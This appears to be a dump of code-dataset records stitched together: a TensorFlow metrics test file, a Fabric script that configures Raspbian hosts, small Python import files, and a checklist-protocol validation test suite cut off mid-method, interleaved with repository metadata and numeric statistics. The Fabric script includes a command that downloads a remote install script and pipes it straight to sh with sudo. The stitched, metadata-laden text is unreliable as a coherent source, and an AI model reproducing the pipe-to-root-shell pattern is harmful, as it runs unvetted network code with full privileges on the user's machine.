return route_duration | 34.725581 | 129 | 0.669971 | 983 | 7,466 | 4.847406 | 0.095626 | 0.035257 | 0.045331 | 0.040294 | 0.882686 | 0.870934 | 0.870934 | 0.860441 | 0.860441 | 0.860441 | 0 | 0.004741 | 0.237209 | 7,466 | 215 | 130 | 34.725581 | 0.831958 | 0.12577 | 0 | 0.868421 | 0 | 0 | 0.055626 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.052632 | false | 0 | 0.026316 | 0 | 0.131579 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
bb1e0b43005be838c5b7a17588214717431928ae | 8,428 | py | Python | liteflow/tests/test_metrics.py | petrux/LiteFlowX | 96197bf4b5a87e682c980d303a0e6429cdb34964 | [
"Apache-2.0"
] | 2 | 2017-07-11T13:14:48.000Z | 2017-12-10T22:14:06.000Z | liteflow/tests/test_metrics.py | petrux/LiteFlowX | 96197bf4b5a87e682c980d303a0e6429cdb34964 | [
"Apache-2.0"
] | null | null | null | liteflow/tests/test_metrics.py | petrux/LiteFlowX | 96197bf4b5a87e682c980d303a0e6429cdb34964 | [
"Apache-2.0"
] | 1 | 2019-11-13T02:15:51.000Z | 2019-11-13T02:15:51.000Z | """Test module for the liteflow.metrics module."""
import mock
import numpy as np
import tensorflow as tf
from liteflow import metrics
from liteflow import streaming
class TestStreamingMetric(tf.test.TestCase):
"""Base test class for the liteflow.metrics.StreamingMetric class."""
def test_default(self):
"""Default test case."""
scope = 'MyScope'
targets = tf.constant([[0, 1, 2], [0, 9, 23]], dtype=tf.int32)
predictions = tf.constant([[0, 1, 2], [0, 9, 23]], dtype=tf.int32)
weights = tf.constant([[1, 1, 1], [0, 0, 1]], dtype=tf.float32)
values = tf.constant([5, 6, 7], dtype=tf.float32)
weights_out = tf.constant([1, 0, 1], dtype=tf.float32)
func = mock.Mock()
func.side_effect = [(values, weights_out)]
avg = streaming.StreamingAverage()
avg.compute = mock.MagicMock()
metric = metrics.StreamingMetric(func, avg)
metric.compute(targets, predictions, weights, scope=scope)
func.assert_called_once_with(targets, predictions, weights)
avg.compute.assert_called_once()
args, kwargs = avg.compute.call_args
act_values, act_weights_out = args
self.assertEqual(act_values, values)
self.assertEqual(act_weights_out, weights_out)
self.assertIn('scope', kwargs)
self.assertEqual(kwargs.pop('scope').name, scope)
def test_weights_in_none(self):
"""Test case with no weights passed to the wrapped function."""
scope = 'MyScope'
targets = tf.constant([[0, 1, 2], [0, 9, 23]], dtype=tf.int32)
predictions = tf.constant([[0, 1, 2], [0, 9, 23]], dtype=tf.int32)
values = tf.constant([5, 6, 7], dtype=tf.float32)
weights_out = tf.constant([1, 0, 1], dtype=tf.float32)
func = mock.Mock()
func.side_effect = [(values, weights_out)]
avg = streaming.StreamingAverage()
avg.compute = mock.MagicMock()
metric = metrics.StreamingMetric(func, avg)
metric.compute(targets, predictions, scope=scope)
func.assert_called_once_with(targets, predictions, None)
avg.compute.assert_called_once()
args, kwargs = avg.compute.call_args
act_values, act_weights_out = args
self.assertEqual(act_values, values)
self.assertEqual(act_weights_out, weights_out)
self.assertIn('scope', kwargs)
self.assertEqual(kwargs.pop('scope').name, scope)
def test_weights_out_none(self):
"""Test case with no weights returned by the wrapped function."""
scope = 'MyScope'
targets = tf.constant([[0, 1, 2], [0, 9, 23]], dtype=tf.int32)
predictions = tf.constant([[0, 1, 2], [0, 9, 23]], dtype=tf.int32)
weights = tf.constant([[1, 1, 1], [0, 0, 1]], dtype=tf.float32)
values = tf.constant([5, 6, 7], dtype=tf.float32)
func = mock.Mock()
func.side_effect = [(values, None)]
avg = streaming.StreamingAverage()
avg.compute = mock.MagicMock()
metric = metrics.StreamingMetric(func, avg)
metric.compute(targets, predictions, weights, scope=scope)
func.assert_called_once_with(targets, predictions, weights)
avg.compute.assert_called_once()
args, kwargs = avg.compute.call_args
act_values, act_weights_out = args
self.assertEqual(act_values, values)
self.assertEqual(act_weights_out, None)
self.assertIn('scope', kwargs)
self.assertEqual(kwargs.pop('scope').name, scope)
def test_weights_in_out_none(self):
"""Test case with no weights at all."""
scope = 'MyScope'
targets = tf.constant([[0, 1, 2], [0, 9, 23]], dtype=tf.int32)
predictions = tf.constant([[0, 1, 2], [0, 9, 23]], dtype=tf.int32)
values = tf.constant([5, 6, 7], dtype=tf.float32)
func = mock.Mock()
func.side_effect = [(values, None)]
avg = streaming.StreamingAverage()
avg.compute = mock.MagicMock()
metric = metrics.StreamingMetric(func, avg)
metric.compute(targets, predictions, scope=scope)
func.assert_called_once_with(targets, predictions, None)
avg.compute.assert_called_once()
args, kwargs = avg.compute.call_args
act_values, act_weights_out = args
self.assertEqual(act_values, values)
self.assertEqual(act_weights_out, None)
self.assertIn('scope', kwargs)
self.assertEqual(kwargs.pop('scope').name, scope)
class TestAccuracy(tf.test.TestCase):
"""Test class for the liteflow.metrics.accuracy function."""
def test_default(self):
"""Default test case."""
targets = tf.constant([[2, 1, 0, 0]], dtype=tf.int32)
weights = tf.placeholder(dtype=tf.float32, shape=targets.shape)
predictions = tf.constant(
[[[0.1, 0.8, 0.1], # predicted: 1, WRONG.
[0.1, 0.8, 0.1], # predicted: 1, CORRECT.
[0.8, 0.1, 0.1], # predicted: 0, CORRECT
[0.1, 0.1, 0.8]]], # predicted: 2, WRONG.
dtype=tf.float32)
accuracy_t, weights_out_t = metrics.accuracy(targets, predictions, weights)
act_weights = np.asarray([[1, 1, 0, 0]], dtype=np.float32) # pylint: disable=I0011,E1101
exp_accuracy = np.asarray([[0, 1, 0, 0]], dtype=np.float32) # pylint: disable=I0011,E1101
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
act_accuracy, act_weights_out = sess.run(
fetches=[accuracy_t, weights_out_t],
feed_dict={weights: act_weights})
self.assertEqual(weights, weights_out_t)
self.assertAllEqual(act_weights, act_weights_out)
self.assertAllEqual(exp_accuracy, act_accuracy)
def test_no_weights(self):
"""Test case with no weights."""
targets = tf.constant([[2, 1, 0, 0]], dtype=tf.int32)
predictions = tf.constant(
[[[0.1, 0.8, 0.1], # predicted: 1, WRONG.
[0.1, 0.8, 0.1], # predicted: 1, CORRECT.
[0.8, 0.1, 0.1], # predicted: 0, CORRECT
[0.1, 0.1, 0.8]]], # predicted: 2, WRONG.
dtype=tf.float32)
accuracy_t, weights_t = metrics.accuracy(targets, predictions)
exp_accuracy = np.asarray([[0, 1, 1, 0]], dtype=np.float32) # pylint: disable=I0011,E1101
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
act_accuracy = sess.run(accuracy_t)
self.assertIsNone(weights_t)
self.assertAllEqual(exp_accuracy, act_accuracy)
class TestPerSentenceAccuracy(tf.test.TestCase):
"""Test class for the liteflow.metrics.per_sentence_accuracy function."""
def test_default(self):
"""Default test case."""
targets = tf.constant([[1, 2, 3, 4], [1, 2, 3, 4]], dtype=tf.int32)
predictions = tf.constant([[1, 2, 3, 0], [1, 2, 3, 0]], dtype=tf.int32)
weights = tf.constant([[1, 1, 1, 1], [1, 1, 1, 0]], dtype=tf.float32)
accuracy_t, weights_t = metrics.per_sentence_accuracy(targets, predictions, weights)
exp_accuracy = np.asarray([0, 1], dtype=np.float32) # pylint: disable=I0011,E1101
exp_weights = np.asarray([1, 1], dtype=np.float32) # pylint: disable=I0011,E1101
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
act_accuracy, act_weights = sess.run([accuracy_t, weights_t])
self.assertAllEqual(act_accuracy, exp_accuracy)
self.assertAllEqual(act_weights, exp_weights)
def test_no_weights(self):
"""Test case for weightless metric."""
targets = tf.constant([[1, 2, 3, 4], [1, 2, 3, 0]], dtype=tf.int32)
predictions = tf.constant([[1, 2, 3, 0], [1, 2, 3, 0]], dtype=tf.int32)
accuracy_t, weights_t = metrics.per_sentence_accuracy(targets, predictions)
exp_accuracy = np.asarray([0, 1], dtype=np.float32) # pylint: disable=I0011,E1101
exp_weights = np.asarray([1, 1], dtype=np.float32) # pylint: disable=I0011,E1101
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
act_accuracy, act_weights = sess.run([accuracy_t, weights_t])
self.assertAllEqual(act_accuracy, exp_accuracy)
self.assertAllEqual(act_weights, exp_weights)
if __name__ == '__main__':
tf.test.main()
| 40.325359 | 98 | 0.622093 | 1,102 | 8,428 | 4.622505 | 0.098004 | 0.013349 | 0.03298 | 0.023557 | 0.895563 | 0.881037 | 0.850805 | 0.827444 | 0.809973 | 0.779348 | 0 | 0.05173 | 0.238491 | 8,428 | 208 | 99 | 40.519231 | 0.741976 | 0.103346 | 0 | 0.790541 | 0 | 0 | 0.010158 | 0 | 0 | 0 | 0 | 0 | 0.222973 | 1 | 0.054054 | false | 0 | 0.033784 | 0 | 0.108108 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
2481606a34fbd5d1a5d906c37dcdc1b3f3e28163 | 9,422 | py | Python | fabfile/inithostos.py | Basic-Components/deploy_toolkit | becf249d47aac283390f62cd308d54072e974485 | [
"MIT"
] | null | null | null | fabfile/inithostos.py | Basic-Components/deploy_toolkit | becf249d47aac283390f62cd308d54072e974485 | [
"MIT"
] | null | null | null | fabfile/inithostos.py | Basic-Components/deploy_toolkit | becf249d47aac283390f62cd308d54072e974485 | [
"MIT"
] | null | null | null | import json
from fabric import task, Connection
import invoke
from termcolor import colored
@task(aliases=["raspbian的更新包管理器"])
def apt_update(c: Connection) -> None:
    """Update the apt package index."""
try:
        result = c.sudo("apt update -y", hide=True)
except invoke.exceptions.UnexpectedExit as uee:
print(colored(uee, 'white', 'on_red'))
raise uee
except invoke.exceptions.Failure as fe:
print(colored(fe, 'white', 'on_cyan'))
raise fe
except invoke.exceptions.ThreadException as te:
print(colored(te, 'white', 'on_cyan'))
raise te
except Exception as e:
print(colored(str(e), 'white', 'on_yellow'))
raise e
else:
msg = f"Ran {result.command!r} on {result.connection.host}, got stdout:\n{result.stdout}"
print(msg)
@task(aliases=["重启机器"])
def reboot(c: Connection) -> None:
    """Reboot the machine."""
    try:
        result = c.sudo("reboot", hide=True)
except invoke.exceptions.UnexpectedExit as uee:
print(colored(uee, 'white', 'on_red'))
raise uee
except invoke.exceptions.Failure as fe:
print(colored(fe, 'white', 'on_cyan'))
raise fe
except invoke.exceptions.ThreadException as te:
print(colored(te, 'white', 'on_cyan'))
raise te
except Exception as e:
print(colored(str(e), 'white', 'on_yellow'))
raise e
else:
msg = f"Ran {result.command!r} on {result.connection.host}, got stdout:\n{result.stdout}"
print(msg)
@task(aliases=["更新内核"])
def apt_upgrade(c: Connection) -> None:
    """Upgrade installed packages and reboot."""
apt_update(c)
try:
        result = c.sudo("apt upgrade -y", hide=True)
except invoke.exceptions.UnexpectedExit as uee:
print(colored(uee, 'white', 'on_red'))
raise uee
except invoke.exceptions.Failure as fe:
print(colored(fe, 'white', 'on_cyan'))
raise fe
except invoke.exceptions.ThreadException as te:
print(colored(te, 'white', 'on_cyan'))
raise te
except Exception as e:
print(colored(str(e), 'white', 'on_yellow'))
raise e
else:
msg = f"Ran {result.command!r} on {result.connection.host}, got stdout:\n{result.stdout}"
print(msg)
reboot(c)
@task(aliases=["raspbian的apt换源"])
def raspbian_apt_change_mirror(c: Connection) -> None:
    """Switch apt to the USTC mirrors, then update, upgrade and reboot."""
try:
result = c.sudo("""sh -c 'echo "deb http://mirrors.ustc.edu.cn/raspbian/raspbian/ stretch main contrib non-free rpi" > /etc/apt/sources.list'""", hide=True)
except invoke.exceptions.UnexpectedExit as uee:
print(colored(uee, 'white', 'on_red'))
raise uee
except invoke.exceptions.Failure as fe:
print(colored(fe, 'white', 'on_cyan'))
raise fe
except invoke.exceptions.ThreadException as te:
print(colored(te, 'white', 'on_cyan'))
raise te
except Exception as e:
print(colored(str(e), 'white', 'on_yellow'))
raise e
else:
msg = f"Ran {result.command!r} on {result.connection.host}, got stdout:\n{result.stdout}"
print(msg)
try:
result = c.sudo("""sh -c 'echo "deb http://mirrors.ustc.edu.cn/archive.raspberrypi.org/debian/ stretch main ui" > /etc/apt/sources.list.d/raspi.list'""", hide=True)
except invoke.exceptions.UnexpectedExit as uee:
print(colored(uee, 'white', 'on_red'))
raise uee
except invoke.exceptions.Failure as fe:
print(colored(fe, 'white', 'on_cyan'))
raise fe
except invoke.exceptions.ThreadException as te:
print(colored(te, 'white', 'on_cyan'))
raise te
except Exception as e:
print(colored(str(e), 'white', 'on_yellow'))
raise e
else:
msg = f"Ran {result.command!r} on {result.connection.host}, got stdout:\n{result.stdout}"
print(msg)
apt_upgrade(c)
@task(aliases=["安装包"])
def install_package(c: Connection, package: str) -> None:
    """Install a single package with apt-get."""
try:
result = c.sudo(f"apt-get install -y {package}", hide=True)
except invoke.exceptions.UnexpectedExit as uee:
print(colored(uee, 'white', 'on_red'))
raise uee
except invoke.exceptions.Failure as fe:
print(colored(fe, 'white', 'on_cyan'))
raise fe
except invoke.exceptions.ThreadException as te:
print(colored(te, 'white', 'on_cyan'))
raise te
except Exception as e:
print(colored(str(e), 'white', 'on_yellow'))
raise e
else:
msg = f"Ran {result.command!r} on {result.connection.host}, got stdout:\n{result.stdout}"
print(msg)
@task(aliases=["安装zsh"])
def install_zsh(c: Connection) -> None:
    """Install zsh and set up oh-my-zsh."""
install_package(c, package="zsh")
try:
result = c.sudo("wget https://github.com/robbyrussell/oh-my-zsh/raw/master/tools/install.sh -O - | sh", hide=True)
except invoke.exceptions.UnexpectedExit as uee:
print(colored(uee, 'white', 'on_red'))
raise uee
except invoke.exceptions.Failure as fe:
print(colored(fe, 'white', 'on_cyan'))
raise fe
except invoke.exceptions.ThreadException as te:
print(colored(te, 'white', 'on_cyan'))
raise te
except Exception as e:
print(colored(str(e), 'white', 'on_yellow'))
raise e
else:
msg = f"Ran {result.command!r} on {result.connection.host}, got stdout:\n{result.stdout}"
print(msg)
reboot(c)
@task(aliases=["安装编辑器"])
def install_editor(c: Connection) -> None:
    """Install nano and vim, and push a prettified vim config."""
install_package(c, package="nano")
install_package(c, package="vim")
try:
result = c.sudo("update-alternatives --display vi", hide=True)
except invoke.exceptions.UnexpectedExit as uee:
print(colored(uee, 'white', 'on_red'))
raise uee
except invoke.exceptions.Failure as fe:
print(colored(fe, 'white', 'on_cyan'))
raise fe
except invoke.exceptions.ThreadException as te:
print(colored(te, 'white', 'on_cyan'))
raise te
except Exception as e:
print(colored(str(e), 'white', 'on_yellow'))
raise e
else:
msg = f"Ran {result.command!r} on {result.connection.host}, got stdout:\n{result.stdout}"
print(msg)
try:
result = c.put(local="vimrc", remote=".vimrc")
except Exception as e:
print(colored(str(e), 'white', 'on_yellow'))
raise e
else:
msg = f"put file on {result.connection.host}, got stdout:\n{result.stdout}"
print(msg)
@task(aliases=["状态"])
def check_status(c: Connection) -> None:
    """Report disk, memory, IO and CPU status."""
    # Check disk usage
try:
result = c.sudo("df -h", hide=True)
except invoke.exceptions.UnexpectedExit as uee:
print(colored(uee, 'white', 'on_red'))
raise uee
except invoke.exceptions.Failure as fe:
print(colored(fe, 'white', 'on_cyan'))
raise fe
except invoke.exceptions.ThreadException as te:
print(colored(te, 'white', 'on_cyan'))
raise te
except Exception as e:
print(colored(str(e), 'white', 'on_yellow'))
raise e
else:
msg = f"Ran {result.command!r} on {result.connection.host}, got stdout:\n{result.stdout}"
print(msg)
    # Check memory usage
try:
result = c.sudo("free -m", hide=True)
except invoke.exceptions.UnexpectedExit as uee:
print(colored(uee, 'white', 'on_red'))
raise uee
except invoke.exceptions.Failure as fe:
print(colored(fe, 'white', 'on_cyan'))
raise fe
except invoke.exceptions.ThreadException as te:
print(colored(te, 'white', 'on_cyan'))
raise te
except Exception as e:
print(colored(str(e), 'white', 'on_yellow'))
raise e
else:
msg = f"Ran {result.command!r} on {result.connection.host}, got stdout:\n{result.stdout}"
print(msg)
    # Check IO and CPU usage
try:
result = c.sudo("iostat 1 1", hide=True)
except invoke.exceptions.UnexpectedExit as uee:
print(colored(uee, 'white', 'on_red'))
raise uee
except invoke.exceptions.Failure as fe:
print(colored(fe, 'white', 'on_cyan'))
raise fe
except invoke.exceptions.ThreadException as te:
print(colored(te, 'white', 'on_cyan'))
raise te
except Exception as e:
print(colored(str(e), 'white', 'on_yellow'))
raise e
else:
msg = f"Ran {result.command!r} on {result.connection.host}, got stdout:\n{result.stdout}"
print(msg)
@task(aliases=["清除缓存"], help={"level": "Cache-drop level; must be 1, 2 or 3."})
def free_cache(c: Connection, level=1) -> None:
    """Drop kernel caches by writing `level` to /proc/sys/vm/drop_caches."""
    if level not in (1, 2, 3):
        raise ValueError("level must be 1, 2 or 3")
try:
result = c.sudo(f"sh -c 'echo {level} > /proc/sys/vm/drop_caches'", hide=True)
except invoke.exceptions.UnexpectedExit as uee:
print(colored(uee, 'white', 'on_red'))
raise uee
except invoke.exceptions.Failure as fe:
print(colored(fe, 'white', 'on_cyan'))
raise fe
except invoke.exceptions.ThreadException as te:
print(colored(te, 'white', 'on_cyan'))
raise te
except Exception as e:
print(colored(str(e), 'white', 'on_yellow'))
raise e
else:
msg = f"Ran {result.command!r} on {result.connection.host}, got stdout:\n{result.stdout}"
print(msg)
| 34.386861 | 172 | 0.613776 | 1,239 | 9,422 | 4.615012 | 0.121872 | 0.102833 | 0.13851 | 0.067156 | 0.804302 | 0.789087 | 0.789087 | 0.789087 | 0.789087 | 0.789087 | 0 | 0.001684 | 0.243473 | 9,422 | 273 | 173 | 34.512821 | 0.800505 | 0.012842 | 0 | 0.819672 | 0 | 0.061475 | 0.244713 | 0.077579 | 0 | 0 | 0 | 0 | 0 | 1 | 0.036885 | false | 0 | 0.016393 | 0 | 0.053279 | 0.254098 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
24ae8ac22a3291f73cab53622705ffed0df929ea | 47 | py | Python | src/masonite/routes/commands/__init__.py | cercos/masonite | f7f220efa7fae833683e9f07ce13c3795a87d3b8 | [
"MIT"
] | 1,816 | 2018-02-14T01:59:51.000Z | 2022-03-31T17:09:20.000Z | src/masonite/routes/commands/__init__.py | cercos/masonite | f7f220efa7fae833683e9f07ce13c3795a87d3b8 | [
"MIT"
] | 340 | 2018-02-11T00:27:26.000Z | 2022-03-21T12:00:24.000Z | src/masonite/routes/commands/__init__.py | cercos/masonite | f7f220efa7fae833683e9f07ce13c3795a87d3b8 | [
"MIT"
] | 144 | 2018-03-18T00:08:16.000Z | 2022-02-26T01:51:58.000Z | from .RouteListCommand import RouteListCommand
| 23.5 | 46 | 0.893617 | 4 | 47 | 10.5 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.085106 | 47 | 1 | 47 | 47 | 0.976744 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
24c2fd4d186296298b0396a414c256dbda7a22f4 | 101 | py | Python | devito/ir/ietxdsl/__init__.py | xdslproject/devito | 44a3f00dc701924876ba23379291dddecd047ddc | [
"MIT"
] | null | null | null | devito/ir/ietxdsl/__init__.py | xdslproject/devito | 44a3f00dc701924876ba23379291dddecd047ddc | [
"MIT"
] | 2 | 2021-11-22T16:31:41.000Z | 2022-03-16T12:00:14.000Z | devito/ir/ietxdsl/__init__.py | xdslproject/devito | 44a3f00dc701924876ba23379291dddecd047ddc | [
"MIT"
] | null | null | null | from devito.ir.ietxdsl.operations import * # noqa
from devito.ir.ietxdsl.cgeneration import * # noqa
| 33.666667 | 50 | 0.782178 | 14 | 101 | 5.642857 | 0.571429 | 0.253165 | 0.303797 | 0.481013 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.118812 | 101 | 2 | 51 | 50.5 | 0.88764 | 0.089109 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
24ea84a4e2434db6b721d27ad75f063197b1d598 | 14,855 | py | Python | checklists_scrapers/tests/validation/test_protocol.py | StuartMacKay/checklists_scrapers | a6151481554e761ca0cd9a190f6a27334b130cdf | [
"BSD-3-Clause"
] | 4 | 2015-10-25T15:43:06.000Z | 2021-05-06T03:18:23.000Z | checklists_scrapers/tests/validation/test_protocol.py | StuartMacKay/checklists_scrapers | a6151481554e761ca0cd9a190f6a27334b130cdf | [
"BSD-3-Clause"
] | null | null | null | checklists_scrapers/tests/validation/test_protocol.py | StuartMacKay/checklists_scrapers | a6151481554e761ca0cd9a190f6a27334b130cdf | [
"BSD-3-Clause"
] | null | null | null | """Validate the protocol in each downloaded checklist.
Validation Tests:
Protocol:
1. the protocol is a dict.
ProtocolName:
1. name is a string.
2. name is set.
3. name does not have leading/trailing whitespace.
ProtocolTime:
1. time is a string.
2. time has the format 'dd:dd'
ProtocolDuration
1. duration hours is an int.
    2. duration minutes is an int.
ProtocolDistance
1. distance is an int.
ProtocolArea
1. area is an int.
EbirdProtocolName
    1. The protocol name matches the values used on ebird.
WorldBirdsProtocolName
    1. The protocol name matches the default value used for WorldBirds.
"""
from checklists_scrapers.tests.validation import checklists, ValidationTestCase
class Protocol(ValidationTestCase):
"""Validate the protocols in the downloaded checklists."""
def setUp(self):
"""Initialize the test."""
self.protocols = [(checklist['protocol'], checklist['source'])
for checklist in checklists]
def test_protocol_type(self):
"""Verify the protocols field contains a dict."""
for protocol, source in self.protocols:
self.assertIsInstance(protocol, dict, msg=source)
class ProtocolName(ValidationTestCase):
"""Validate the protocol name in the downloaded checklists."""
def setUp(self):
"""Initialize the test."""
self.protocols = [(checklist['protocol'], checklist['source'])
for checklist in checklists]
def test_name_type(self):
"""Verify the protocol name is a unicode string."""
for protocol, source in self.protocols:
self.assertIsInstance(protocol['name'], unicode, msg=source)
def test_name_set(self):
"""Verify the protocol name is set."""
for protocol, source in self.protocols:
self.assertTrue(protocol['name'], msg=source)
def test_name_stripped(self):
"""Verify the protocol name has no extra whitespace."""
for protocol, source in self.protocols:
self.assertStripped(protocol['name'], msg=source)
class ProtocolTime(ValidationTestCase):
"""Validate the protocol time in the downloaded checklists."""
def setUp(self):
"""Initialize the test."""
self.protocols = [(checklist['protocol'], checklist['source'])
for checklist in checklists]
    def test_time_type(self):
        """Verify the protocol time is a unicode string."""
for protocol, source in self.protocols:
self.assertIsInstance(protocol['time'], unicode, msg=source)
    def test_time_format(self):
        """Verify the protocol time has the format 'dd:dd'."""
for protocol, source in self.protocols:
self.assertRegexpMatches(protocol['time'], r'\d\d:\d\d', msg=source)
class ProtocolDuration(ValidationTestCase):
"""Validate the duration hours and minutes."""
def setUp(self):
"""Initialize the test."""
self.protocols = [(checklist['protocol'], checklist['source'])
for checklist in checklists
if checklist['protocol']['name'] == 'Traveling']
def test_duration_hours(self):
"""Verify the protocol duration in hours is an int."""
for protocol, source in self.protocols:
self.assertIsInstance(protocol['duration_hours'], int, msg=source)
def test_duration_minutes(self):
"""Verify the protocol duration in minutes is an int."""
for protocol, source in self.protocols:
self.assertIsInstance(protocol['duration_minutes'], int, msg=source)
class ProtocolDistance(ValidationTestCase):
"""Validate the distance covered."""
def setUp(self):
"""Initialize the test."""
self.protocols = [(checklist['protocol'], checklist['source'])
for checklist in checklists
if checklist['protocol']['name'] == 'Traveling']
def test_distance(self):
        """Verify the protocol distance is an int."""
for protocol, source in self.protocols:
self.assertIsInstance(protocol['distance'], int, msg=source)


class ProtocolArea(ValidationTestCase):
    """Validate the area covered."""

    def setUp(self):
        """Initialize the test."""
        self.protocols = [(checklist['protocol'], checklist['source'])
                          for checklist in checklists
                          if checklist['protocol']['name'] == 'Area']

    def test_area(self):
        """Verify the protocol area is an int."""
        for protocol, source in self.protocols:
            self.assertIsInstance(protocol['area'], int, msg=source)


class EbirdProtocolName(ValidationTestCase):
    """Validate the protocol names in the downloaded checklists from ebird."""

    def setUp(self):
        """Initialize the test."""
        self.protocols = [(checklist['protocol'], checklist['source'])
                          for checklist in checklists
                          if checklist['source'] == 'ebird']

    def test_expected_names(self):
        """Verify the protocol name is expected.

        This compares the protocol name against the list on ebird.org as of
        2013-06-25 and alerts to any changes.
        """
        expected = ['Traveling', 'Stationary', 'Incidental', 'Area', 'Random',
                    'Oiled Birds', 'Nocturnal Flight Call Count',
                    'Greater Gulf Refuge Waterbird Count',
                    'Heron Area Count', 'Heron Stationary Count']
        for protocol, source in self.protocols:
            self.assertIn(protocol['name'], expected, msg=source)


class EbirdTravelingProtocol(ValidationTestCase):
    """Validate the fields set in the Traveling protocol from ebird."""

    def setUp(self):
        """Initialize the test."""
        self.protocols = [(checklist['protocol'], checklist['source'])
                          for checklist in checklists
                          if checklist['source'] == 'ebird' and
                          checklist['protocol']['name'] == 'Traveling']

    def test_time_set(self):
        """Verify the time is set for the Traveling protocol."""
        for protocol, source in self.protocols:
            self.assertTrue(protocol['time'], msg=source)

    def test_duration_set(self):
        """Verify the duration is set for the Traveling protocol."""
        for protocol, source in self.protocols:
            self.assertTrue(protocol['duration_hours'] or
                            protocol['duration_minutes'], msg=source)

    def test_distance_set(self):
        """Verify the distance is set for the Traveling protocol."""
        for protocol, source in self.protocols:
            self.assertTrue(protocol['distance'], msg=source)

    def test_area_clear(self):
        """Verify the area is not set for the Traveling protocol."""
        for protocol, source in self.protocols:
            self.assertEqual(0, protocol['area'], msg=source)


class EbirdStationaryProtocol(ValidationTestCase):
    """Validate the fields set in the Stationary protocol from ebird."""

    def setUp(self):
        """Initialize the test."""
        self.protocols = [(checklist['protocol'], checklist['source'])
                          for checklist in checklists
                          if checklist['source'] == 'ebird' and
                          checklist['protocol']['name'] == 'Stationary']

    def test_time_set(self):
        """Verify the time is set for the Stationary protocol."""
        for protocol, source in self.protocols:
            self.assertTrue(protocol['time'], msg=source)

    def test_duration_set(self):
        """Verify the duration is set for the Stationary protocol."""
        for protocol, source in self.protocols:
            self.assertTrue(protocol['duration_hours'] or
                            protocol['duration_minutes'], msg=source)

    def test_distance_clear(self):
        """Verify the distance is not set for the Stationary protocol."""
        for protocol, source in self.protocols:
            self.assertEqual(0, protocol['distance'], msg=source)

    def test_area_clear(self):
        """Verify the area is not set for the Stationary protocol."""
        for protocol, source in self.protocols:
            self.assertEqual(0, protocol['area'], msg=source)


class EbirdAreaProtocol(ValidationTestCase):
    """Validate the fields set in the Area protocol from ebird."""

    def setUp(self):
        """Initialize the test."""
        self.protocols = [(checklist['protocol'], checklist['source'])
                          for checklist in checklists
                          if checklist['source'] == 'ebird' and
                          checklist['protocol']['name'] == 'Area']

    def test_time_set(self):
        """Verify the time is set for the Area protocol."""
        for protocol, source in self.protocols:
            self.assertTrue(protocol['time'], msg=source)

    def test_duration_set(self):
        """Verify the duration is set for the Area protocol."""
        for protocol, source in self.protocols:
            self.assertTrue(protocol['duration_hours'] or
                            protocol['duration_minutes'], msg=source)

    def test_distance_clear(self):
        """Verify the distance is not set for the Area protocol."""
        for protocol, source in self.protocols:
            self.assertEqual(0, protocol['distance'], msg=source)

    def test_area_set(self):
        """Verify the area is set for the Area protocol."""
        for protocol, source in self.protocols:
            self.assertTrue(protocol['area'], msg=source)


class EbirdRandomProtocol(ValidationTestCase):
    """Validate the fields set in the Random protocol from ebird."""

    def setUp(self):
        """Initialize the test."""
        self.protocols = [(checklist['protocol'], checklist['source'])
                          for checklist in checklists
                          if checklist['source'] == 'ebird' and
                          checklist['protocol']['name'] == 'Random']

    def test_time_set(self):
        """Verify the time is set for the Random protocol."""
        for protocol, source in self.protocols:
            self.assertTrue(protocol['time'], msg=source)

    def test_duration_set(self):
        """Verify the duration is set for the Random protocol."""
        for protocol, source in self.protocols:
            self.assertTrue(protocol['duration_hours'] or
                            protocol['duration_minutes'], msg=source)

    def test_distance_set(self):
        """Verify the distance is set for the Random protocol."""
        for protocol, source in self.protocols:
            self.assertTrue(protocol['distance'], msg=source)

    def test_area_clear(self):
        """Verify the area is not set for the Random protocol."""
        for protocol, source in self.protocols:
            self.assertEqual(0, protocol['area'], msg=source)


class EbirdIncidentalProtocol(ValidationTestCase):
    """Validate the fields set in the Incidental protocol from ebird."""

    def setUp(self):
        """Initialize the test."""
        self.protocols = [(checklist['protocol'], checklist['source'])
                          for checklist in checklists
                          if checklist['source'] == 'ebird' and
                          checklist['protocol']['name'] == 'Incidental']

    def test_time_set(self):
